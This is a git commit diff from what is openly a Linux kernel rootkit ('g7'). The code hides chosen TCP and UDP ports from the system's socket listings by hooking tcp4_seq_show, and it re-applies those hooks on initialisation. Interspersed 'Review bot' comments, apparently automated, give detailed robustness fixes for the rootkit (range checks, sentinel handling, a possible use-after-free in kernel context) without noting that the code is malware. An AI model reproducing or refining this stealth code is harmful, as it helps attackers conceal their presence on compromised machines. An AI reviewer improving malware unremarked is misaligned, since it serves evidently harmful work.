commit 005fd32ac661d6d886fa818a5932b65ee7becb63
parent e7ca4b8f93a447d2addcaed2a8f87978f421f50b
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Sun, 13 Dec 2020 02:27:53 +0100
Fix many stupid mistakes in sockhide.c
Diffstat:
3 files changed, 20 insertions(+), 13 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -191,8 +191,8 @@ handle_tcphide(unsigned long arg)
unhook_show();
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
- remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp4);
- remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp6);
+ unhide_port((port_t)-sarg, tcp4);
+ unhide_port((port_t)-sarg, tcp6);
DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
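Review bot: The casts `(port_t)-sarg` in this hunk and `(port_t)sarg` in the following hunks (the tcp add path and both udp paths) narrow `sarg` with no range check, so a value outside the port range is silently truncated to a different port. `sarg` is presumably a `long` (it is printed with `%ld`), in which case `-sarg` is also signed overflow when it equals `LONG_MIN`. The width of `port_t` is not visible in this diff; assuming 16 bits, reject out-of-range input before the branches, e.g. `if (sarg < -65535 || sarg > 65535) return;`, adjusting the return to the function's type. handle_tcphide starts and ends outside this hunk.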
@@ -200,8 +200,8 @@ handle_tcphide(unsigned long arg)
DEBUG_NOTICE("[g7] socket hiding on\n");
}
- add_port_to_list(&hidden_ports, (port_t)sarg, tcp4);
- add_port_to_list(&hidden_ports, (port_t)sarg, tcp6);
+ hide_port((port_t)sarg, tcp4);
+ hide_port((port_t)sarg, tcp6);
DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
}
@@ -218,16 +218,16 @@ handle_udphide(unsigned long arg)
rootkit.hiding_sockets = 0;
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
- remove_port_from_list(&hidden_ports, (port_t)-sarg, udp4);
- remove_port_from_list(&hidden_ports, (port_t)-sarg, udp6);
+ unhide_port((port_t)-sarg, udp4);
+ unhide_port((port_t)-sarg, udp6);
DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
hook_show();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
- add_port_to_list(&hidden_ports, (port_t)sarg, udp4);
- add_port_to_list(&hidden_ports, (port_t)sarg, udp6);
+ hide_port((port_t)sarg, udp4);
+ hide_port((port_t)sarg, udp6);
DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
}
diff --git a/src/hook.c b/src/hook.c
@@ -21,6 +21,7 @@
#include "openhide.h"
#include "read.h"
#include "inputlog.h"
+#include "sockhide.h"
extern rootkit_t rootkit;
@@ -90,6 +91,9 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
+
+ if (rootkit.hiding_sockets)
+ hook_show();
}
void
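Review bot: Nothing documents who owns `rootkit.hiding_sockets`. init_hooks now calls `hook_show()` when the flag is already set, while the handlers in src/channel.c call it only when the flag is clear, and the remove_hooks hunk calls `unhook_show()` with no visible reset of the flag. Whether `hook_show()` tolerates being called while the hook is already installed cannot be told from this diff. A comment above the new lines would settle the intent, e.g. `/* flag persists across remove_hooks()/init_hooks(); re-apply the show hooks here */`. Both function bodies start outside their hunks.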
@@ -114,6 +118,9 @@ remove_hooks(void)
if (rootkit.logging_input)
unlog_input();
+
+ if (rootkit.hiding_sockets)
+ unhook_show();
}
void
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -8,8 +8,8 @@
#include "sockhide.h"
port_list_t hidden_ports = {
- .port = 41124,
- .proto = tcp4,
+ .port = -1,
+ .proto = -1,
.prev = NULL,
.next = NULL,
};
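Review bot: `.port = -1` and `.proto = -1` are undocumented magic sentinels, and the head node is still compared by find_port_in_list, which starts its loop at `head`. The definitions of `port_t` and `proto` are outside this diff; if `port_t` is an unsigned 16-bit type, `-1` is stored as 65535, which is a valid port, so the head is excluded only because no protocol value equals `-1`. Named constants and a comment such as `/* placeholder head: must never equal a real (port, proto) pair */` would make that invariant explicit. Building with `-Wconversion` would flag the implicit conversion.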
@@ -78,7 +78,7 @@ unhook_show(void)
void
hide_port(port_t port, proto proto)
{
- add_port_to_list(&hidden_ports, port, proto);
+ add_port_to_list(hidden_ports_tail, port, proto);
}
void
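Review bot: `hidden_ports_tail` becomes the insertion point here, but its definition and the code that keeps it current are outside this diff. If add_port_to_list does not advance it after appending, later inserts reuse the same node's link. If the removal path frees the node it points to without moving it back, the next hide_port call writes through a freed pointer in kernel context. Both paths are worth confirming, and the variable deserves a comment stating the invariant, e.g. `/* always the last node of hidden_ports; updated on every add and remove */`.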
@@ -97,7 +97,7 @@ port_list_t_ptr
find_port_in_list(port_list_t_ptr head, port_t port, proto proto)
{
port_list_t_ptr i;
- for (i = head; i; i = i->next)
+ for (i = head; i; i = i->next)
if (i->port == port && i->proto == proto)
return i;
@@ -166,7 +166,7 @@ g7_tcp4_seq_show(struct seq_file *seq, void *v)
if(list_contains_port(&hidden_ports, src, tcp4)
|| list_contains_port(&hidden_ports, dst, tcp4))
return 0;
-
+
return tcp4_seq_show(seq, v);
}